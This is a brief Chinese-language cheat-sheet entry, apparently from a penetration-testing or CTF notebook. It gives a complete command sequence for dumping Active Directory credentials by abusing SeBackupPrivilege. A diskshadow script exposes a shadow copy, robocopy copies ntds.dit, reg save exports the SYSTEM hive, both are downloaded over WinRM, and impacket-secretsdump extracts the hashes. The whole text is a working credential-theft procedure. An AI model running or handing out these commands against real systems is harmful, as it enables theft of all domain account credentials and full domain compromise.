权限: 一般是需要当前用户有 SeBackupPrivilege
#建一个文件,下面是文件内容
set context persistent nowriters
add volume c: alias raj
create
expose %raj% z:
unix2dos raj.dsh #转换格式,兼容windows
cd C:\Temp
upload raj.dsh #winrm上操作
diskshadow /s raj.dsh
robocopy /b z:\windows\ntds . ntds.dit
reg save hklm\system c:\Temp\system
cd C:\Temp
download ntds.dit
download system
然后使用 impacket-secretsdump 解密ntds.dit
impacket-secretsdump -ntds ntds.dit -system system local